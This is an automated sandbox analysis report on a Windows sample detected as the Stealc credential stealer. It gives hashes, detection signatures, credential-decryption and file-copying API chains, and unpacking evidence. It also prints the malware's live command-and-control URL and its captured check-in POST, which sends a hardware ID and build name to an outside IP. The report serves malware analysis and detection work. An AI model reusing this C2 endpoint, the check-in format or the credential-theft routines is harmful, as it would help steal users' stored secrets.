Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OW2Pw3W81N.exe

Overview

General Information

Sample name:OW2Pw3W81N.exe
renamed because original name is a hash value
Original sample name:e75f8e807dc1f52a4ea99ce19f8d9e9f.exe
Analysis ID:1530565
MD5:e75f8e807dc1f52a4ea99ce19f8d9e9f
SHA1:337f44814b4260b07a9d13ff4913619113e4d3a9
SHA256:3339f2291951c0b62f885df33512216aa80f98cf73b93fc6c21c3314d68b4cb6
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OW2Pw3W81N.exe (PID: 4148 cmdline: "C:\Users\user\Desktop\OW2Pw3W81N.exe" MD5: E75F8E807DC1F52A4EA99CE19F8D9E9F)
    • WerFault.exe (PID: 7164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x22ae:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2073023114.0000000002330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.OW2Pw3W81N.exe.22e0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.OW2Pw3W81N.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.OW2Pw3W81N.exe.2330000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.OW2Pw3W81N.exe.22e0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.OW2Pw3W81N.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T09:08:26.233410+020020442431Malware Command and Control Activity Detected192.168.2.54970562.122.184.14480TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: OW2Pw3W81N.exeAvira: detected
                      Source: 00000000.00000003.2073023114.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
                      Source: http://62.122.184.144/f88d87a7e087e100.phpVirustotal: Detection: 16%Perma Link
                      Source: http://62.122.184.144Virustotal: Detection: 15%Perma Link
                      Source: http://62.122.184.144/xVirustotal: Detection: 14%Perma Link
                      Source: http://62.122.184.144/Virustotal: Detection: 15%Perma Link
                      Source: OW2Pw3W81N.exeReversingLabs: Detection: 42%
                      Source: OW2Pw3W81N.exeVirustotal: Detection: 50%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: OW2Pw3W81N.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022ECA87
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022E74A7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022E9D27
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022F9107
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022E9DC7

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeUnpacked PE file: 0.2.OW2Pw3W81N.exe.400000.0.unpack
                      Source: OW2Pw3W81N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EF8F1 FindFirstFileA,0_2_022EF8F1
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49705 -> 62.122.184.144:80
                      Source: Malware configuration extractorURLs: http://62.122.184.144/f88d87a7e087e100.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 46 31 33 39 37 44 39 41 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="hwid"34F1397D9A0E1845150070------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build"default5_pal------CGDBFBGIDHCAAKEBAKFI--
                      Source: Joe Sandbox ViewIP Address: 62.122.184.144 62.122.184.144
                      Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 46 31 33 39 37 44 39 41 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="hwid"34F1397D9A0E1845150070------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build"default5_pal------CGDBFBGIDHCAAKEBAKFI--
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, OW2Pw3W81N.exe, 00000000.00000002.2254974020.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.0000000000773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.0000000000773000.00000004.00000020.00020000.00000000.sdmp, OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000076C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php3
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000076C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpc
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/x
                      Source: OW2Pw3W81N.exe, 00000000.00000002.2254974020.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144i$
                      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1064
                      Source: OW2Pw3W81N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: OW2Pw3W81N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: WERCED9.tmp.dmp.4.drBinary string: \Device\HarddiskVolume3\Users\user\Desktop\OW2Pw3W81N.exe
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WJDHTOB5.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4148
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\06e925ea-403b-4d43-827e-0babb06622cfJump to behavior
                      Source: OW2Pw3W81N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: OW2Pw3W81N.exeReversingLabs: Detection: 42%
                      Source: OW2Pw3W81N.exeVirustotal: Detection: 50%
                      Source: unknownProcess created: C:\Users\user\Desktop\OW2Pw3W81N.exe "C:\Users\user\Desktop\OW2Pw3W81N.exe"
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1064
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: OW2Pw3W81N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeUnpacked PE file: 0.2.OW2Pw3W81N.exe.400000.0.unpack .text:ER;.data:W;.yapovi:R;.facajel:R;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeUnpacked PE file: 0.2.OW2Pw3W81N.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: OW2Pw3W81N.exeStatic PE information: section name: .yapovi
                      Source: OW2Pw3W81N.exeStatic PE information: section name: .facajel
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_007148E9 push 7DD07DC0h; iretd 0_2_007148FA
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_007178C8 push eax; ret 0_2_007178D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_007178B9 push eax; ret 0_2_007178D7
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_00713DE3 pushfd ; iretd 0_2_00713DE6
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022FB29C push ecx; ret 0_2_022FB2AF
                      Source: C:\Users\user\Desktop\OW2Pw3W81N.exeCode function: 0_2_022E0F56 pushfd ; iretd 0_2_022E1078
                      Source: OW2Pw3W81N.exeStatic PE information: section name: .text entropy: 6.996753547393799
